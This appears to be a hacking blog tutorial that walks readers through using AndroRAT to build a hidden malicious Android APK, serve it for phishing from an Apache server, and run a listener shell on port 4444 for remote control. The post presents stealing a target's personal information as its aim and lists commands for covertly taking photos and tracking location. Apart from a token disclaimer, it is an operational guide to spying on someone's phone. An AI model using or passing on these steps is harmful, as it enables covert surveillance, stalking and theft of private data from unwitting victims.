There are many hackers in this world who may be currently watching your activities daily and will try to steal your personal information.

And today, I’ll be showing you how to do just that!

Prerequisite

Let's start our Hacking

We will be using a hacking method which is phishing for our today's Blog. You can learn more about phishing on Wikipedia. The tool which we will be using is AndroRat.

AndroRAT is a tool designed to give the control of the android system remotely and retrieve information from it. Androrat is a client/server application developed in Java Android for the client-side and the Server is in Python.

A Simple android remote administration tool using sockets. It uses java on the client-side and python on the server-side

Clone the repository given below.

By HTTPS

git clone https://github.com/karma9874/AndroRAT.git

By SSH

git clone [email protected]:karma9874/AndroRAT.git

Go to the directory where you have cloned the repository by cd command.

cd <Directory_name>AndroRat

Moving Further, Now we have to install some requirements for our installation by pip By using the pip command, We can install python package libraries with a single click.

Installing Requirements

pip install -r requirements.txt

cat requirements.txt

Building a malicious apk file for spying

We will be building a malicious apk file which is needed to be installed on the target phone and the good thing is that after installing this apk, your apk file gets hidden and no one can see this file. Cool, right?

Let's Build this malicious file

for building this apk you need to type the command given below

python3 androRat.py --build -i <ip_address> -p 4444 -o <apk_name>.apk

Explanation of the Above code

ifconfig

If you don't know where is ip address of your machine is written in ifconfig given output then you should search for 192 prefixed numbers in your ifconfig output.

The output should look like the image given below.

Now it’s time to host the listener

All you got to do is to write the code given below

python3 androRAT.py --shell -i 0.0.0.0 -p 4444

sudo systemctl status apache2.service

sudo cp piyush.apk /var/www/html/

<ip_address>/piyush.apk

For example, if you want to take a picture of the target mobile then type 'takepic' command. If or want to get their location then type 'getLocation' command.

This Blog was for Entertainment purposes, don't try to do anything unethical with it because you are always responsible for your actions.

To anonymous, don't try to hack-in by my IP address, I have already changed it.

See you in the next one. Bye, Bye.